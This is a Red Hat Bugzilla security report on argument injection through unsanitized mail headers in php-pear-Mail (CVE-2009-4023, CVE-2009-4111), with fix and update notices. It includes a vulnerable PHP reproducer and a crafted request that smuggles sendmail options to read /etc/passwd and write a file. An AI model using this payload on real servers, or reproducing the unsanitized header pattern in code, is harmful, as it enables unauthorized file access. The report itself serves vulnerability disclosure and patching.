Bug 540842 (CVE-2009-4023, CVE-2009-4111)
| Summary: | CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header fields | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | unspecified | CC: | fedora, mjc |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://pear.php.net/bugs/bug.php?id=16200 | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 2010-12-21 22:04:57 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | 541964 | ||
| Bug Blocks: | |||
|
Description
Jan Lieskovsky
2009-11-24 10:37:59 UTC
Reproducer:
-----------
<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx";
$subj = "subscription request";
$body = "subscribe me"; $hdrs = array(
"To" => $to,
"Cc" => $cc,
"Bcc" => $bcc,
"From" => $from,
"Subject" => $subject,
);
$body="test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>
test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3
Note: You might need to change the patch to ':/usr/share/pear/:'.
After this I can view the content of my /etc/passwd with
some add-ons as /tmp/wokao.
This issue affects the versions of the php-pear-Mail package, as shipped with Fedora release of 10, 11, 12 and as shipped with Extra Packages for Enteprise Linux 5 (EPEL-5) project. Please fix. This is CVE-2009-4023. php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5. http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1 Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail: Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted $recipients parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023. References: ----------- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111 http://www.openwall.com/lists/oss-security/2009/11/23/8 http://www.openwall.com/lists/oss-security/2009/11/28/2 http://pear.php.net/bugs/bug.php?id=16200 https://bugs.gentoo.org/show_bug.cgi?id=294256 php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report. php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report. php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report. php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report. |